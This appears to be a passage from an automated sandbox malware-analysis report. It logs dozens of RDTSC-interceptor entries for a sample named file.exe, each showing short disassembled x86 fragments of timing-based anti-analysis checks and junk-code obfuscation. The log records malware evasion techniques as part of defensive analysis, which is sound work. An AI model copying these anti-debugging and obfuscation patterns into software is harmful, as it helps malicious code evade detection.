                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49292 second address: D49296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49BFD second address: D49C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4ABAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49AA5 second address: D49AB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007F0D34B708F6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49C0F second address: D49C72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007F0D344F4AB6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0D344F4AB8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F0D344F4AB8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov esi, dword ptr [ebp+122D30A0h] 0x0000004d xchg eax, ebx 0x0000004e push ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49C72 second address: D49C83 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B5E9 second address: D4B635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F0D344F4AB8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D1800h], edx 0x0000002c push 00000000h 0x0000002e jmp 00007F0D344F4ABFh 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 push edi 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BEEB second address: D4BEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BEEF second address: D4BEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BEFE second address: D4BF16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0D34B708F6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F0D34B708F6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BF16 second address: D4BF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BF1A second address: D4BF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0D34B708FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BF2F second address: D4BF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F0D344F4AB8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D1969h], ecx 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D39CDh] 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 xor dword ptr [ebp+122D23FEh], edx 0x00000038 pop edi 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BF74 second address: D4BF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BF78 second address: D4BF85 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C7C5 second address: D4C7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51CC1 second address: D51D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4AC8h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F0D344F4AC5h 0x00000010 nop 0x00000011 mov dword ptr [ebp+12458732h], ebx 0x00000017 push 00000000h 0x00000019 call 00007F0D344F4AC9h 0x0000001e mov dword ptr [ebp+12444A28h], edx 0x00000024 pop edi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F0D344F4AB8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov edi, esi 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push esi 0x00000046 pushad 0x00000047 popad 0x00000048 pop esi 0x00000049 push eax 0x0000004a jnp 00007F0D344F4AB6h 0x00000050 pop eax 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jc 00007F0D344F4AB6h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51D56 second address: D51D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52B71 second address: D52B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51EA4 second address: D51EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51EB0 second address: D51EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51EB4 second address: D51EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51EBD second address: D51F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F0D344F4AB8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 sub bh, FFFFFFB5h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov bl, 22h 0x00000034 mov eax, dword ptr [ebp+122D0701h] 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F0D344F4AB8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 push FFFFFFFFh 0x00000056 mov dword ptr [ebp+122D243Eh], ecx 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 pushad 0x00000061 popad 0x00000062 jnl 00007F0D344F4AB6h 0x00000068 popad 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53AA6 second address: D53AB0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53AB0 second address: D53AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52D9C second address: D52DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52DA1 second address: D52DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D344F4ABCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52DB1 second address: D52DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F0D34B708F6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0D34B70907h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54AAC second address: D54B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0D344F4ABCh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D39CDh] 0x00000016 push 00000000h 0x00000018 ja 00007F0D344F4ABBh 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F0D344F4AB8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D368Fh], edi 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54B01 second address: D54B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53CC6 second address: D53CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55B61 second address: D55B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55B6C second address: D55BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 nop 0x00000007 sub dword ptr [ebp+1246F218h], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F0D344F4AB8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1D12h], ecx 0x0000002f push 00000000h 0x00000031 add ebx, 1E48A7B8h 0x00000037 mov edi, ebx 0x00000039 xchg eax, esi 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55BB0 second address: D55BC4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55BC4 second address: D55BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55BC9 second address: D55BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54C6D second address: D54C77 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54C77 second address: D54C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54C7D second address: D54C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54C97 second address: D54C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54C9B second address: D54CA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54CA5 second address: D54CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56AEF second address: D56BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F0D344F4AC7h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F0D344F4AB8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e xor edi, 140AC914h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F0D344F4AB8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 add bx, 14BDh 0x00000055 or ebx, 7B5B9E01h 0x0000005b and edi, dword ptr [ebp+122D36BDh] 0x00000061 xchg eax, esi 0x00000062 jbe 00007F0D344F4ACAh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F0D344F4AC4h 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55DAC second address: D55DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D34B70908h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56D18 second address: D56D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56D1C second address: D56D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56D20 second address: D56D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0D344F4AB8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov ebx, dword ptr [ebp+122D2A0Ch] 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov dword ptr [ebp+122D27C9h], edi 0x0000003c mov eax, dword ptr [ebp+122D0009h] 0x00000042 clc 0x00000043 stc 0x00000044 push FFFFFFFFh 0x00000046 mov ebx, 53A96C00h 0x0000004b nop 0x0000004c jl 00007F0D344F4AC6h 0x00000052 jns 00007F0D344F4AC0h 0x00000058 push eax 0x00000059 push edi 0x0000005a pushad 0x0000005b jmp 00007F0D344F4ABBh 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57C40 second address: D57C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57C46 second address: D57C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57C4A second address: D57C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59B05 second address: D59B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59B09 second address: D59B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59B0D second address: D59B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59B13 second address: D59B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59B19 second address: D59B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AC52 second address: D5ACAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F0D34B70907h 0x0000000f popad 0x00000010 nop 0x00000011 push ebx 0x00000012 xor ebx, dword ptr [ebp+122D3941h] 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c js 00007F0D34B708F7h 0x00000022 cmc 0x00000023 popad 0x00000024 push 00000000h 0x00000026 movsx edi, cx 0x00000029 mov dword ptr [ebp+122D25EFh], ebx 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5ACAA second address: D5ACB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BBAF second address: D5BC10 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F0D34B708F8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F0D34B708F8h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov di, si 0x00000044 push 00000000h 0x00000046 sub dword ptr [ebp+122D30B7h], eax 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jnl 00007F0D34B708F6h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BC10 second address: D5BC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BC15 second address: D5BC35 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F0D34B708FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F0D34B708F6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5CC63 second address: D5CCCD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D344F4AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F0D344F4ABEh 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D19ECh], ecx 0x00000018 and edi, 03D18329h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F0D344F4AB8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a cld 0x0000003b push 00000000h 0x0000003d mov bx, si 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0D344F4AC1h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5CCCD second address: D5CCD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59E10 second address: D59E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59E16 second address: D59E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE83 second address: D5DE8D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5CE61 second address: D5CE6B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D34B708FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDE1 second address: D5EDE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EFB0 second address: D5EFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60037 second address: D6003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6003B second address: D60041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68091 second address: D680CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F0D344F4AC7h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D344F4AC9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D680CB second address: D680CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D678BC second address: D678C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67BE4 second address: D67BF2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67BF2 second address: D67BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
